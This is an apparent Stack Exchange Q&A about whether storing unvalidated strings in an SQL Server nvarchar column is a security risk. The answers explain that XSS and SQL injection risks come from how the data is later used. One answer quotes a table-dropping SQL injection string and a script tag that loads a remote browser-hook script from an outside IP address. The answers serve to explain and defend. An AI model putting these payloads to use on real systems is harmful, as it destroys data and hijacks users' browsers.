# What are the security vulnerability of letting users insert anything to a nvarchar sql column?

Tags: sql-injection, sql-server

I have several Web APIs that are used by the UI, for these APIs I have several validations that prevent users from adding invalid data. On the other hand, I have some APIs that are not used by any UI, these APIs are called from another code. For example, one of the APIs is storing a date and string in a table. I don't show these data anywhere and I only use them for report purposes for myself. I wonder how this can be a security issue for my platform? For example, if I store HTML, JS, or SQL code in a column? can this kind of data inside my table be an issue for me? I don't want to add validations as the string could be anything.

Answer (score 2):

It is not an issue what kind of data are stored in the column, but what expectations the code using the data has, i.e. what is done with the data.

If all the code treats the data as being arbitrary binary from untrusted sources, then fine. If some code assumes that the data are sanitized HTML and plainly merges is with other HTML then this will lead to XSS. Similar with SQL injection, command injection, whatever ... Wrong expectations might also be done by the code storing the data and might lead to SQL injection when storing the data.

> I don't want to add validations as the string could be anything.

The word "string" and some other context sounds to me like there is an implicit expectation, that the data should be printable, i.e. not be arbitrary binary data. If this is actually the expectation, then it should also be validated, i.e. that it is a valid text string being properly encoded with the kind of encoding you expect (for example UTF-8).

Answer (score 0):

The question itself is pretty broad, but at face value it presents two major issues:

- they could insert a value of `Robert'; DROP TABLE Students; --` [ref](https://xkcd.com/327/)
- they could insert a value of `<script src="http://1.1.1.1/hook.js”></script>` [ref](http://beefproject.com/)

One of these would be [SQL injection](https://owasp.org/www-community/attacks/SQL_Injection) which could destroy your entire database.
The other is an example of [XSS or cross site scripting](https://owasp.org/www-community/attacks/xss/) in which the injected code could cause havoc on whatever page displayed this entry.

In both cases you should make use of [Input Validation](https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html) on both client and server side to prevent these and other potential pitfalls.